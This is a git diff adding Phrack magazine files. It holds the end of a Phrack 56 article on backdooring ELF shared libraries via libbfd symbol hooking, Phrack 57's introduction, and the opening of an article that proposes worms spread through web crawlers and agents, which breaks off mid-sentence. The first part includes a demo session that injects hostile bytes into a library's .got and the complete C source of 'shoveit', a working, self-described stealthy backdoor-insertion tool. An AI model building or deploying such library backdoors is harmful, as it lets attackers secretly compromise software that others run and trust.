+	#define BSF_SECTION_SYM         0x100
+	#define BSF_OLD_COMMON          0x200
+	#define BFD_FORT_COMM_DEFAULT_VALUE 0
+	#define BSF_NOT_AT_END          0x400
+	#define BSF_CONSTRUCTOR         0x800
+	#define BSF_WARNING             0x1000
+	#define BSF_INDIRECT            0x2000
+	#define BSF_FILE                0x4000
+	#define BSF_DYNAMIC             0x8000
+	#define BSF_OBJECT              0x10000
+	  	struct sec *section;
+	  	union
+	    	{
+	      		ptr p;
+	      		bfd_vma i;
+	    	} udata;
+	} asymbol;
+
+Unlike sections, symbol entries are located using an array of pointers, but
+they also point back to both their parent bfd (using *the_bfd) and their
+parent section (using *section).  Symbols we will be interested in hooking
+will have the BSF_FUNCTION flag on.  The name and the relative value of the
+symbol are pointed and stored in the name and value fields, respectively (as
+you could have guessed).  We will use both of them in order to locate our
+targeted symbol. 
+
+In order to read the symbol table of an object file, we will first have to
+get its size by using the bfd_get_symtab_upper_bound() (whose only
+argument is the bfd of our target object).  Once this is done, we will be
+able to malloc a buffer and fill it with the object's symbol table using
+bfd_canonicalize_symtab().  This bfd function will receive the object's
+bfd followed by the malloc'ed buffer as arguments, and return the number
+of canonicalized symbols read.
+
+When processing the table in order to hook our specific symbol (which we
+will seek by value instead of name, for reasons we will see in the next
+section), we will have to consider the fact that each symbol's value
+has been modified by libbfd to look relative to their respective section's
+beginning.  For that reason, the first symbol of a random section will
+always seem to have a value of 0x0, although its pretty different
+physically.
+
+Once the symbol table has been altered at will, it is possible to dump it
+back into its object file using the bfd_set_symtab() function, which
+requires as argument the object's bfd, the pointer to the symbol table
+(the malloc'ed buffer) and the number of symbols to be written.
+
+
+----|  Dynamic symbol hooking
+
+When it comes to hooking shared objects the hooking process becomes quite
+different.  First of all, shared objects use a different symbol table
+than the one used for static linking.  Under ELF, these symbols are stored
+in the ".dynsym" section, but remain represented in the same way a static
+symbol is.  Also, all the names of the symbols stored in the ".dynsym"
+section of the object are kept in a different section, called ".dynstr".
+
+However, this is far from being the most problematic part.  Although you
+will be able to use libbfd to read dynamic symbols in the same way you
+read standard symbols, there does not seem to be any dynamic symbol table
+dumping function implemented in libbfd yet.  In order words, it means that
+our wonderfully portable insertion/hooking combo technique will lose
+pretty much of its portability in this operation.  However, since dynamic
+linking is almost only (in the most interesting cases) used in ELF, the
+sacrifice is not too expensive. 
+
+Now that we know we will have to manually modify the dynamic symbol table,
+we have a small practical dilemma.  Since the dynamic symbol table is located
+within a section of our target object, we will probably want to perform
+dynamic symbol hooking while copying each of the file's section.  The dilemma
+is that, as said before, the symbol names are stored in a different section of
+the file.  Two possibilities are offered to us.  The first one is to load both
+tables into memory and resolve the links between the *st_name fields of the
+.dynsym section and the strings of the .dynstr section.  However, since we are
+lazy, we will probably prefer the alternative solution, where we will locate
+each symbol by its original value instead of its name (as noted in the
+previous section).
+
+Now that we are ready to process the dynamic symbol table manually, it would
+be required to know what an ELF symbol entry looks like:
+
+	typedef struct elf32_sym {
+  		Elf32_Word    st_name;
+  		Elf32_Addr    st_value;
+  		Elf32_Word    st_size;
+  		unsigned char st_info;
+  		unsigned char st_other;
+  		Elf32_Half    st_shndx;
+	} Elf32_Sym;
+
+As in the bfd transparent symbol structure, most of the fields we are
+interested in are pretty self-explanatory.  If we now take a look at what the
+.dynsym section looks like, we will see this:
+
+	ipdev:~/tmp/bfd$ objdump --full-contents --section=.dynsym lib.so
+
+	lib.so:     file format elf32-i386
+
+	Contents of section .dynsym:
+	 00d0 00000000 00000000 00000000 00000000  ................
+	 00e0 01000000 14120000 00000000 1100f1ff  ................
+	 00f0 0a000000 08120000 00000000 1100f1ff  ................
+	 0100 20000000 d8010000 13000000 12000500   ...............
+	 0110 25000000 00000000 00000000 10000000  %...............
+	 0120 2c000000 ec010000 14000000 12000500  ,...............
+	 0130 31000000 00020000 00000000 1100f1ff  1...............
+	 0140 38000000 64120000 00000000 1100f1ff  8...d...........
+	 0150 3f000000 64120000 00000000 1100f1ff  ?...d...........
+	 0160 4b000000 64120000 00000000 1100f1ff  K...d...........
+	ipdev:~/tmp/bfd$
+
+You can observe that the first entry of the dynamic symbol table (the second
+being used by the _DYNAMIC section symbol which has value of 0x1214) is nulled
+out.  To our eyes, it's just another mystic feature established by the ELF
+standard, which is not worth being taken in consideration for our hooking
+operation.
+
+
+----|  SHOVEIT: a multipurpose code insertion tool
+
+In order to simplify the task of backdooring shared libraries and static
+objects, I wrote a nice little tool which will enable you to use some bfd
+APIs without having to worry about programming.  Of course, this could open the
+door to script kiddies, but they would have had to go thru all of this article
+before using it, and I doubt most of them can do that.  The tool is located
+at the end of the article, extractable using the Phrack Magazine Extraction
+Utility.
+
+Lets take a look at a practical code insertion example using shoveit.  Suppose
+here we are backdooring the same lib.so shared library as we were trying to
+backdoor at the beginning of this article.  Its most interesting symbols are
+still the function haha (the one we call) at address 0x1d8 and the function
+huhu (the one we hook) at address 0x1ec.  We are also using the backdoor we
+wrote previously, "eggcode.s". 
+
+	ipdev:~/tmp/bfd$ gcc -c test.s
+	ipdev:~/tmp/bfd$ objdump -h test.o
+	
+	test.o:     file format elf32-i386
+	
+	Sections:
+	Idx Name          Size      VMA       LMA       File off  Algn
+	  0 .text         00000023  00000000  00000000  00000034  2**2
+	                  CONTENTS, ALLOC, LOAD, READONLY, CODE
+	  1 .data         00000000  00000000  00000000  00000058  2**2
+	                  CONTENTS, ALLOC, LOAD, DATA
+	  2 .bss          00000000  00000000  00000000  00000058  2**2
+	                  ALLOC
+	ipdev:~/tmp/bfd$
+	
+We now see that all of our backdoor's code is stored in the eggcode's
+text section.  Before pushing it into our target library, we will have to
+verify where it will be placed after insertion, so that we can hook the
+library's symbol table correctly.
+
+	ipdev:~/tmp/bfd$ objdump -h lib.so
+	
+	lib.so:     file format elf32-i386
+	
+	Sections:
+	Idx Name          Size      VMA       LMA       File off  Algn
+	  0 .hash         0000003c  00000094  00000094  00000094  2**2
+	                  CONTENTS, ALLOC, LOAD, READONLY, DATA
+	  1 .dynsym       000000a0  000000d0  000000d0  000000d0  2**2
+	                  CONTENTS, ALLOC, LOAD, READONLY, DATA
+	  2 .dynstr       00000050  00000170  00000170  00000170  2**0
+	                  CONTENTS, ALLOC, LOAD, READONLY, DATA
+	  3 .rel.text     00000018  000001c0  000001c0  000001c0  2**2
+	                  CONTENTS, ALLOC, LOAD, READONLY, DATA
+	  4 .text         00000028  000001d8  000001d8  000001d8  2**2
+	                  CONTENTS, ALLOC, LOAD, READONLY, CODE
+	  5 .rodata       00000006  00000200  00000200  00000200  2**0
+	                  CONTENTS, ALLOC, LOAD, READONLY, DATA
+	  6 .data         00000000  00001208  00001208  00000208  2**2
+	                  CONTENTS, ALLOC, LOAD, DATA
+	  7 .got          0000000c  00001208  00001208  00000208  2**2
+	                  CONTENTS, ALLOC, LOAD, DATA	
+	  8 .dynamic      00000050  00001214  00001214  00000214  2**2
+	                  CONTENTS, ALLOC, LOAD, DATA
+	  9 .bss          00000000  00001264  00001264  00000264  2**2
+	                  ALLOC
+	 10 .note         00000014  00000000  00000000  00000264  2**0
+	                  CONTENTS, READONLY
+	 11 .comment      00000012  00000000  00000000  00000278  2**0
+	                  CONTENTS, READONLY
+	ipdev:~/tmp/bfd$ nm --dynamic lib.so
+	00001214 A _DYNAMIC
+	00001208 A _GLOBAL_OFFSET_TABLE_
+	00001264 A __bss_start
+	00001264 A _edata
+	00001264 A _end
+	00000200 A _etext
+	000001d8 T haha
+	000001ec T huhu
+	         U printf
+	ipdev:~/tmp/bfd$
+
+Great.  We observe that if we insert our hostile code right after the global
+offset table's content, we will have to alter the huhu's value from 0x1ec
+to 0x1214 (0x1208+0xc).  We will now use shoveit to append our backdoor code
+to our library's .got section, and to hook the "huhu" symbol so it points
+to the position at which our backdoor was inserted.
+
+	ipdev:~/tmp/bfd$ ./shoveit test.o .text lib.so .got 0x1ec 0x1214
+	Hooking statsyms from 0x1ec to 0x1214
+	Hooking dynsyms from 0x1ec to 0x1214
+	Inserting 35 hostile bytes into .got
+	ipdev:~/tmp/bfd$ nm --dynamic lib.so
+	00001214 A _DYNAMIC
+	00001208 A _GLOBAL_OFFSET_TABLE_
+	00001264 A __bss_start
+	00001264 A _edata
+	00001264 A _end
+	00000200 A _etext	
+	000001d8 T haha
+	00001214 T huhu
+	         U printf
+	ipdev:~/tmp/bfd$ objdump -D --section=.got \
+			 --start-address=0x1214 lib.so
+	
+	lib.so:     file format elf32-i386
+	
+	Disassembly of section .got:
+	00001214 <.got+c> nop
+	00001215 <.got+d> nop
+	00001216 <.got+e> nop
+	00001217 <.got+f> nop
+	00001218 <.got+10> nop
+	00001219 <.got+11> nop
+	0000121a <.got+12> pushl  %ebp
+	0000121b <.got+13> movl   %esp,%ebp
+	0000121d <.got+15> jmp    0000122b <_DYNAMIC+17>
+	0000121f <.got+17> call   000001d8 <haha>
+	00001224 <.got+1c> addl   $0x4,%esp
+	00001227 <.got+1f> movl   %ebp,%esp
+	00001229 <.got+21> popl   %ebp
+	0000122a <.got+22> ret
+	0000122b <.got+23> call   0000121f <_DYNAMIC+b>
+	00001230 <.got+28> ja     0000129a <__bss_start+36>
+	00001232 <.got+2a> outsl  %ds:(%esi),(%dx)
+	00001233 <.got+2b> jb     0000129a <__bss_start+36>
+	00001235 <.got+2d> orb    (%eax),%al
+	ipdev:~/tmp/bfd$
+	
+Wonderful.  We have inserted our hostile code at vma 0x1214 in the library
+and hooked the huhu symbol to make it point to it.  Furthermore, you can
+observe that our calculations from the first part of this article were right:
+our code successfully calls the haha() function within the target library.
+Nothing can stop us from now on...
+
+	ipdev:~/tmp/bfd$ ldd prog
+	        ./lib.so => ./lib.so
+	ipdev:~/tmp/bfd$ ./prog
+	whore
+	ipdev:~/tmp/bfd$
+
+
+----|  The END (sniff)
+
+I hope you all enjoyed this little demonstration.  Of course, this is not a
+new class of vulnerability, however, I hope it will help some people to
+understand that once your host has lost its integrity, you should always
+assume the worst.  The fact that a system's source code is tightly preserved
+from prying eyes is not a valid argument when it comes to security.  One
+way or the other, the standards you follow will make your software as
+potentially vulnerable as any other software.
+
+Greats to adm, promisc, wiretrip, teso, w00w00, and of course, phrack.
+
+
+----|  Shoveit
+
+<++> p56/bfd/shoveit.c !6de17d5d
+/*
+ *
+ *	Coded by klog <klog@promisc.org>
+ *
+ *	libbfd relies on libiberty, so
+ *	cc -c shoveit.c first, then cc shoveit.o -lbfd -liberty
+ *
+ *	shoveit <src_obj> <src_segment> <dst_obj> <dst_segment>
+ * 		<orig_addr> <new_addr>
+ *
+ *	This tool will insert "src_segment" from "src_obj" into
+ *	"dst_segment" of "dst_obj", and alter "symbol" to physical 
+ *	value "value".
+ *
+ *	Portable, stealth, flexible.
+ *	Have fun :)
+ *
+ *	NB: shoveit does *not* perform relocation
+ *
+ */
+
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <bfd.h>
+#include <strings.h>
+#include <linux/elf.h>
+
+#define DYNSTAB ".dynsym"
+
+#define nonfatal(s) {perror(s); return;}
+#define fatal(s) {perror(s); exit(-1);}
+#define bfd_nonfatal(s) {bfd_perror(s); return;}
+#define bfd_fatal(s) {bfd_perror(s); exit(-1);}
+
+char *input_section;
+char *output_section;
+char *input_filename;
+
+static bfd *bd_bfd;
+static sec_ptr bdsection;
+static int bd_size = 0;
+static int isdone = 0;
+static int vma_offset = 0;
+
+static long hooksym;
+static long hookval;
+
+void hook_dynstab(struct elf32_sym *symtab, bfd_size_type size)
+{
+	int symcount, i;
+
+ 	symcount = size/sizeof(asymbol);
+	for(i=0;i<symcount;i++) {
+		if (symtab[i].st_value == hooksym) 
+			symtab[i].st_value = hookval;
+	}
+}
+
+void setup_section(bfd *ibfd, sec_ptr isection, bfd *obfd)
+{
+  	struct section_list *p;
+  	sec_ptr osection;
+  	bfd_vma vma;
+  	bfd_vma lma;
+  	flagword flags;
+  	char *err;
+	int isdest = 0;
+
+	if (!strcmp(output_section, isection->name)) isdest = 1;	
+
+  	osection = bfd_make_section_anyway(obfd, 
+		   bfd_section_name(ibfd, isection));
+
+  	if (osection == NULL)
+		fatal("making section");
+
+	if (isdone) vma_offset = bd_size;
+
+	if (isdest) {
+  		if (!bfd_set_section_size(obfd, osection,
+			bfd_section_size(ibfd, isection)+bd_size))
+			bfd_fatal("setting size");
+		isdone = 1;
+	} else {
+  		if (!bfd_set_section_size(obfd, osection,
+			bfd_section_size(ibfd, isection)))
+			bfd_fatal("setting size");		
+	}
+
+  	vma = bfd_section_vma (ibfd, isection) + vma_offset;
+  	if (!bfd_set_section_vma(obfd, osection, vma))
+		fatal("setting vma");
+
+  	osection->lma = isection->lma + vma_offset;
+
+  	if (bfd_set_section_alignment(obfd, osection,
+		bfd_section_alignment(ibfd, isection)) == false)
+		fatal("setting alignment");
+
+  	flags = bfd_get_section_flags(ibfd, isection);
+  	if (!bfd_set_section_flags(obfd, osection, flags))
+		bfd_nonfatal("setting flags");
+
+  	isection->output_section = osection;
+  	isection->output_offset = 0;
+
+  	if (!bfd_copy_private_section_data(ibfd, isection, obfd, osection))
+		fatal("setting private data");
+
+  	return;
+}
+
+
+void copy_section(bfd *ibfd, sec_ptr isection, bfd *obfd)
+{
+  	struct section_list *p;
+  	arelent **relpp;
+  	long relcount;
+  	sec_ptr osection;
+  	bfd_size_type size;
+      	long relsize;
+	int isdest = 0;
+  	char **matching;
+
+	if (!strcmp(output_section, isection->name)) isdest = 1;	
+
+  	osection = isection->output_section;
+  	size = bfd_get_section_size_before_reloc(isection);
+  	if (size == 0 || osection == 0 || bd_size == 0)
+    		return;
+
+  	if (bfd_get_section_flags(ibfd, isection) & SEC_HAS_CONTENTS)
+    	{
+      		PTR memhunk = (PTR)xmalloc((unsigned) size);
+      		if (!bfd_get_section_contents(ibfd, isection, 
+				memhunk, (file_ptr) 0, size))
+	  		nonfatal ("get_contents");
+
+		if (isdest) {
+
+	      		PTR bdhunk = (PTR)xmalloc((unsigned)size+bd_size);
+
+			printf("Inserting %i hostile bytes into %s\n",
+			bd_size, osection->name);
+
+			bcopy(memhunk, bdhunk, size);
+
+      			if (!bfd_get_section_contents(bd_bfd, bdsection, 
+					bdhunk+size, 0, bd_size))
+	  			bfd_nonfatal ("get_contents");
+
+	      		if (!bfd_set_section_contents(obfd, osection, 
+					bdhunk, (file_ptr) 0, size+bd_size))
+	  			bfd_nonfatal("set_contents");
+      			free (bdhunk);
+		} else {
+			if (!strcmp(osection->name, DYNSTAB)) {
+				printf("Entering %s\n", osection->name);
+				hook_dynstab(memhunk, size);
+			}
+      			if (!bfd_set_section_contents(obfd, osection, 
+					memhunk, (file_ptr) 0, size))
+	  			bfd_nonfatal("set_contents");
+    		}
+		free (memhunk);
+	}
+}
+
+
+void copy_object(bfd *ibfd, bfd *obfd)
+{
+	long start;
+  	long symcount, i;
+      	long symsize;
+	char **matching;
+	asymbol **symtab;
+
+  	start = bfd_get_start_address(ibfd);
+
+  	if (!bfd_set_format (obfd, bfd_get_format(ibfd)))
+      		nonfatal ("set_format");
+
+	bd_bfd = bfd_openr(input_filename, "i586-pc-linux-gnulibc1");
+	if (!bd_bfd) bfd_fatal("bfd_openr");
+  	bfd_check_format_matches(bd_bfd, bfd_object, &matching);
+	bdsection = bfd_get_section_by_name(bd_bfd, input_section);
+	if (!bdsection) bfd_fatal("bfd_section");
+	bd_size = bfd_section_size(bd_bfd, bdsection);
+	if (!bd_size) bfd_fatal("section_size");
+
+  	if (!bfd_set_start_address (obfd, start) || 
+	    !bfd_set_file_flags(obfd,(bfd_get_file_flags(ibfd)
+	    & bfd_applicable_file_flags(obfd))))
+    	{
+      		bfd_fatal("set_file_flags");
+    	}
+
+  	if (!bfd_set_arch_mach(obfd, bfd_get_arch (ibfd),
+	    	bfd_get_mach (ibfd)))
+    	{
+      		fprintf (stderr,
+	       		"Output file cannot represent architecture %s\n",
+	       		bfd_printable_arch_mach (bfd_get_arch(ibfd),
+					bfd_get_mach(ibfd)));
+    	}
+  	if (!bfd_set_format (obfd, bfd_get_format(ibfd)))
+      		nonfatal ("set_format");
+
+  	bfd_map_over_sections(ibfd, (void *)setup_section, obfd);
+
+      	symsize = bfd_get_symtab_upper_bound(ibfd);
+      	if (symsize < 0) nonfatal("get_symtab");
+
+      	symtab = (asymbol **)xmalloc(symsize);
+      	symcount = bfd_canonicalize_symtab(ibfd, symtab);
+      	if (symcount < 0) nonfatal("canon_symtab");
+
+	printf("Scanning %i symbols\n", symcount);
+        for(i=0;i<symcount;i++)
+                if (symtab[i]->value == hooksym) {
+                        symtab[i]->value = hookval;     
+			printf("Static symbol \"%s\" =+ %x\n",
+				symtab[i]->name, symtab[i]->value);
+			break;
+	}       
+
+  	bfd_set_symtab(obfd, symtab, symcount);
+
+  	bfd_map_over_sections(ibfd, (void *)copy_section, obfd);
+
+  	if (!bfd_copy_private_bfd_data (ibfd, obfd))
+		fatal("bfd_copy_private_bfd_data");
+}
+
+main(int argc, char *argv[])  
+{
+  	bfd *ibfd;
+  	char **matching;
+	char *output_filename;
+
+	input_filename = argv[1];
+	input_section = argv[2];
+	output_filename = argv[3];
+	output_section = argv[4];
+	hooksym = strtol(argv[5], NULL, 16);
+	hookval = strtol(argv[6], NULL, 16);
+
+	bfd_init();
+
+  	ibfd = bfd_openr(output_filename, "i586-pc-linux-gnulibc1");
+  	if (ibfd == NULL)
+  	{
+  		bfd_nonfatal("openr");
+ 	}
+
+  	if (bfd_check_format_matches(ibfd, bfd_object, &matching))
+  	{
+      		bfd *obfd;
+
+      		obfd = bfd_openw("newlib", "i586-pc-linux-gnulibc1");
+	      	if (obfd == NULL) bfd_fatal("openw");
+
+      		copy_object(ibfd, obfd);
+
+	      	if (!bfd_close(obfd)) bfd_fatal("close");
+      		if (!bfd_close(ibfd)) bfd_fatal("close");
+
+ 		execl("/bin/mv", "/bin/mv", "newlib", 
+			output_filename, NULL);
+
+    	} else {
+      		bfd_fatal("format_matches");
+	}
+}
+<-->
+
+
+|EOF|-------------------------------------------------------------------------|
diff --git a/phrack57/1.txt b/phrack57/1.txt
new file mode 100644
index 0000000..8cdd856
--- /dev/null
+++ b/phrack57/1.txt
@@ -0,0 +1,178 @@
+         ...........            ......       
+    a;:045555558899110::a  .;;;77777777;;o        
+   ";8"   """'''''''""""`        '''  ^77;'  
+  ";8"                                 ^7;'                         
+ ";8"       __                        7!;'        
+";8"..aaa;;9999;;;aa..               76;            
+ "823p"   ''''''     2"^             52;      
+   ;8^              ";;^           '23;        
+  ;P;^                '6^          '57;      
+  ;8;^                '6^          ;&'                       
+  "@;^              ";;8^         ..     ,,,_      ...._     ...    .     .
+  '@;^      .....    2^" ^G7;     HH;  ;R3!1@#'   a;AAAAa;  .###;. !@   .!"
+   !# -+;44319110100~"    !#'     HH:  ;1@   !2;  a;^   a; ;3     .!@   !;^
+   !@"`   '' ''''''        @#$@!!HH;  '1!'   !@;  a;^   8; ;'     ;1;   #!
+    !@^                   "13    "1^  ;!@#57RR:   a;26088; ;'     ;!@!!!'
+    !@^                  "53!    "!2  '!@    ^R;  a;    ;; '#     ;!1''!@^
+     !@^                 '11     '11   !@    ^;   ''    ''  '33;; '1'   !;
+     !^                   ''      ;     '     '    '    ;     ''   !     !'
+      '              
+      ;                    .      '     '     .    ;    '      :   '   
+
+
+                                ==Phrack Inc.==
+
+                   Volume 0x0b, Issue 0x39, Phile #0x01 of 0x12
+
+
+...and the Jedi Knight replied with a strong tongue:
+"There is no gap between phrack56 and phrack57" ...and swang his
+hand from the left to the right with a slight hope to bluff
+the audience...
+
+
+Good News Everyone:
+
+   P H R A C K    I S    B A C K   !@#$!@#$!@#$
+
+|=[ Table of Contents ]=-------------------------------------------------=|
+0x01 Introduction                                      Phrack Staff 0x07 kb
+0x02 Loopback                                          Phrack Staff 0x09 kb
+0x03 Linenoise                                         Phrack Staff 0x1e kb
+0x04 Editorial policy                                  Phrack Staff 0x07 kb
+0x05 IA64 shellcode                                       papasutra 0x15 kb
+0x06 Taranis read your e-mail                              jwilkins 0x0a kb
+0x07 ICMP based OS fingerprinting     Fyodor Yarochkin & Ofir Arkin 0x12 kb
+0x08 Vudo malloc tricks                                        maxx 0x76 kb
+0x09 Once upon a free()                                   anonymous 0x22 kb
+0x0a Against the System: Rise of the Robots         Michal Zalewski 0x0a kb
+0x0b Holistic approaches to attack detection                  sasha 0x12 kb
+0x0c NIDS on mass parallel processing architecture            storm 0x17 kb
+0x0d Hang on, snoopy                                        stealth 0x14 kb
+0x0e Architecture spanning shellcode                         eugene 0x17 kb
+0x0f Writing ia32 alphanumeric shellcodes                       rix 0x56 kb
+0x10 Cupass and the netuserchangepassword problem         D.Holiday 0x14 kb
+0x11 Phrack World News                                 Phrack Staff 0x06 kb
+0x12 Phrack magazine extraction utility                Phrack Staff 0x15 kb
+|=-----------------------------------------------------------------------=|
+
+On this iteration of Phrack magazine there is no single editor.  The
+editorial duties are being carried out by a 'Phrack Staff' collective.
+
+At the moment we are going to remain anonymous and not publish our
+nicks or our names in the magazine.  The reason we are staying anonymous
+is to ensure that people know that we are working on Phrack for all the
+right reasons.  And also of course because privacy is valuable.
+
+Let's talk about privacy for a moment.
+
+It seems to me that lately there is no motive more attractive than
+becomming a celebrities.  Ironically, celebrities have a power that will
+grow more compelling and yet less meaningful in the years to come.  Why?
+Because becomming a celebrity will be easier to achieve.  The drive to
+increase connectivity is ultimately about the access of everyone to 
+everyone and everyone to everything.  A personal home page on the web -
+self-created celebrity - is only the most primitive example of what lies
+ahead, but is an instructive example all the same.  Home pages are self-
+validation, and self-validation lies at the very center of the drive
+towards the desire to become a celebrity.
+
+Like precious metals, society has always valued what is scarce.  As privacy
+becomes rarer and rarer, it will assume greater and greater worth.
+
+Switching subjects, there is another point that I would like to make.  The
+field of information security is vast.  It is vast because it concerns not
+just technology, but also sociology, criminology, economics (think of risk
+modeling), and many other associated subjects.  Even within the technology
+side of information security, there are many different areas of study -
+vulnerability assessment, intrusion detection, public key infrastructure,
+operating system security, and so on.  The point I am working towards is
+that the world does not being and end with shellcode and it certainly
+does not begin and end with exploits.  
+
+You owe it to yourself to investigate what it is about information security
+that makes it the most interesting and challenging field of study within
+information technology today.
+
+It's a big world out there.  Read books.  Experiment.  Don't just do.  Be.
+
+Enjoy the magazine!
+
+
+Phrack Magazine Volume 10 Number 57, August 11, 2001.  ISSN 1068-1035
+Contents Copyright (c) 2001 Phrack Magazine.  All Rights Reserved.
+Nothing may be reproduced in whole or in part without written permission
+from the editors.
+Phrack Magazine is made available to the public, as often as possible, free
+of charge.
+
+|=-----------=[ C O N T A C T   P H R A C K   M A G A Z I N E ]=---------=|
+
+Editors:            phrackstaff@phrack.org
+Submissions:        phrackstaff@phrack.org
+Commentary:         loopback@phrack.org
+Phrack World News:  disorder@phrack.org
+
+|=-----------------------------------------------------------------------=|
+
+Submissions may be encrypted with the following PGP key:
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: GnuPG v1.0.5 (GNU/Linux)
+Comment: For info see http://www.gnupg.org
+
+mQGiBDr0dzURBAC0nXC8TlrGLzTrXBcOq0NP7V3TKp/HUXghV1uhsJLzgXL1N2ad
+XF7yKFoP0RyvC3O4SVhSjFtaJZgwczkkRwgpabOddk77fnCENPvl2n0pWmyZuSQa
+fTEn+P8gmKEeyWXo3EDURgV5OM6m/zVvsQGxkP3/jjGES6eaELXRqqNM9wCgrzkS
+c0a4bJ03ETjcQa8qp3XIuLsD/04nseebHrqgLHZ/1s1gF6wdRFYGlOYY1tvkcIU4
+BRqgJZQu1DIauTEZiLBug+SdRyhJlYPhXWLXr3r7cq3TdxTD1DmM97V8CigA1H5Y
+g7UB0L5ZygL2ezRxMNxyBxPNDRj3VY3niMg/DafqFs4PXSeL/N4/xU45UBeyk7La
+QK2dA/4/FKBpUjXGB83s0omQ9sPHYquTiS51wze3SLpJs0jLnaIUmJ1ayBZqr0xT
+0LPQp72swGcDb5xvaNzNl2rPRKQZyrsDDX8xZdXSw1SrS6xogt83RWS6gbMQ7/Hr
+4AF917ElafjEp4wwd/rekD84RPumRmz4I02FN0xR5VV6K1rbILQkcGhyYWNrc3Rh
+ZmYgPHBocmFja3N0YWZmQHBocmFjay5vcmc+iF0EExECAB0FAjr0dzUFCThkCQAF
+CwcKAwQDFQMCAxYCAQIXgAAKCRDT4MJPPu7c4etbAJ9P/6NeGwx/nyBBTVpMweCQ
+6kFNkQCgnBLX1cmZ7DSg814YjZBFdLczcFS5Ag0EOvR3URAIAOumUGdn+NCs+Ue1
+d1RDCNHg6I8GEeH5DElGWC8jSMor2DOgah31VEcoPgVmtEdL8ZD/tl97vxcEhntA
+ttlELWVJV854kWxRMeCFbBS+fjcQpHCig5WjFzuOrdwBHlNZK2xWCpbV770eSPb/
++z9nosdP8WzmVnJ0JVoIc99JJf3d6YfJuscebB7xn6vJ3hZWM9kqMSyXaG1K3708
+gSfhTr1n9Hs7nDfKMMQ73Svbe6J3kZJNdX0cqZJLHfeiiUrtf0ZCVG52AxfLaWfm
+uPoIpZaJFzexJL/TL9gsRRvVdILd3SmVKtt2koaHNmUgFRVttol3bF8VTiGWb2uX
+S6WjbwcAAwUH/R9Fsk1Vf04qnzZ21DTsjwlA76cOje0Tme1VIYfwE33f3SkFo89+
+jYPFCMNObvSs/JVrstzzZr/c36a4rwi93Mxn7Tg5iT2QEBdDomLb3plpbF3r3OF3
+HcuXYuzNUubiA5J2nf3Rf0DdUVwWmOx8gnqF/QUrKRO+fzomT/jVaAYkVovMBE9o
+csA6t6/vF+SQ5dxPq+6lTJzFY5aK90p1TGHA+2K18yCkcivPEo7b/qu+n9vCOYHM
+WM+cp49bcUMExRkL934O1KUhHxbL96yBRWRzrJaC7ybGjC9hFAQ/wuXzaHOXEHd4
+PqrTZI/rvnRcVJ1CXVt9UfsLXUROaEAtAOOITAQYEQIADAUCOvR3UQUJOGQJAAAK
+CRDT4MJPPu7c4eksAJ9w/y+n6CHeqeUgKCYZ+EKvNWC30gCfYblC4sGwllhPufgT
+gPaxlvAXKrM=
+=p9fB
+-----END PGP PUBLIC KEY BLOCK-----
+
+
+phrack:~# head -20 /usr/include/std-disclaimer.h
+/*
+ *  All information in Phrack Magazine is, to the best of the ability of
+ *  the editors and contributors, truthful and accurate.  When possible,
+ *  all facts are checked, all code is compiled.  However, we are not
+ *  omniscient (hell, we don't even get paid).  It is entirely possible
+ *  something contained within this publication is incorrect in some way.
+ *  If this is the case, please drop us some email so that we can correct
+ *  it in a future issue.
+ *
+ *
+ *  Also, keep in mind that Phrack Magazine accepts no responsibility for
+ *  the entirely stupid (or illegal) things people may do with the
+ *  information contained herein.  Phrack is a compendium of knowledge,
+ *  wisdom, wit, and sass.  We neither advocate, condone nor participate
+ *  in any sort of illicit behavior.  But we will sit back and watch.
+ *
+ *
+ *  Lastly, it bears mentioning that the opinions that may be expressed in
+ *  the articles of Phrack Magazine are intellectual property of their
+ *  authors.
+ *  These opinions do not necessarily represent those of the Phrack Staff.
+ */
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack57/10.txt b/phrack57/10.txt
new file mode 100644
index 0000000..cb9ab49
--- /dev/null
+++ b/phrack57/10.txt
@@ -0,0 +1,223 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x39, Phile #0x0a of 0x12
+
+|=-------------=[ Against the System: Rise of the Robots ]=--------------=|
+|=-----------------------------------------------------------------------=|
+|=-=[ (C)Copyright 2001 by Michal Zalewski <lcamtuf@bos.bindview.com> ]=-=|
+
+
+-- [1] Introduction -------------------------------------------------------
+
+  "[...] big difference between the web and traditional well controlled
+   collections is that there is virtually no control over what people can
+   put on the web. Couple this flexibility to publish anything with the
+   enormous influence of search engines to route traffic and companies
+   which deliberately manipulating search engines for profit become a
+   serious problem."
+
+                      -- Sergey Brin, Lawrence Page (see references, [A])
+
+  Consider a remote exploit that is able to compromise a remote system
+  without sending any attack code to his victim. Consider an exploit 
+  which simply creates local file to compromise thousands of computers,
+  and which does not involve any local resources in the attack. Welcome to 
+  the world of zero-effort exploit techniques. Welcome to the world of
+  automation, welcome to the world of anonymous, dramatically difficult
+  to stop attacks resulting from increasing Internet complexity.
+
+  Zero-effort exploits create their 'wishlist', and leave it somewhere
+  in cyberspace - can be even its home host, in the place where others
+  can find it. Others - Internet workers (see references, [D]) - hundreds 
+  of never sleeping, endlessly browsing information crawlers, intelligent 
+  agents, search engines... They come to pick this information, and - 
+  unknowingly - to attack victims. You can stop one of them, but can't 
+  stop them all. You can find out what their orders are, but you can't 
+  guess what these orders will be tomorrow, hidden somewhere in the abyss 
+  of not yet explored cyberspace. 
+
+  Your private army, close at hand, picking orders you left for them
+  on their way. You exploit them without having to compromise them. They 
+  do what they are designed for, and they do their best to accomplish it.
+  Welcome to the new reality, where our A.I. machines can rise against us.
+
+  Consider a worm. Consider a worm which does nothing. It is carried and 
+  injected by others - but not by infecting them. This worm creates a 
+  wishlist - wishlist of, for example, 10,000 random addresses. And waits. 
+  Intelligent agents pick this list, with their united forces they try to 
+  attack all of them. Imagine they are not lucky, with 0.1% success ratio.
+  Ten new hosts infected. On every of them, the worm does extactly the 
+  same - and agents come back, to infect 100 hosts. The story goes - or
+  crawls, if you prefer.
+
+  Agents work virtually invisibly, people get used to their presence
+  everywhere. And crawlers just slowly go ahead, in never-ending loop. 
+  They work systematically, they do not choke with excessive data - they 
+  crawl, there's no "boom" effect. Week after week after week, they try 
+  new hosts, carefully, not overloading network uplinks, not generating 
+  suspected traffic, recurrent exploration never ends. Can you notice 
+  they carry a worm? Possibly...
+
+-- [2] An example ---------------------------------------------------------
+
+  When this idea came to my mind, I tried to use the simpliest test, just
+  to see if I am right. I targeted, if that's the right word, general-purpose
+  web indexing crawlers. I created very short HTML document and put it
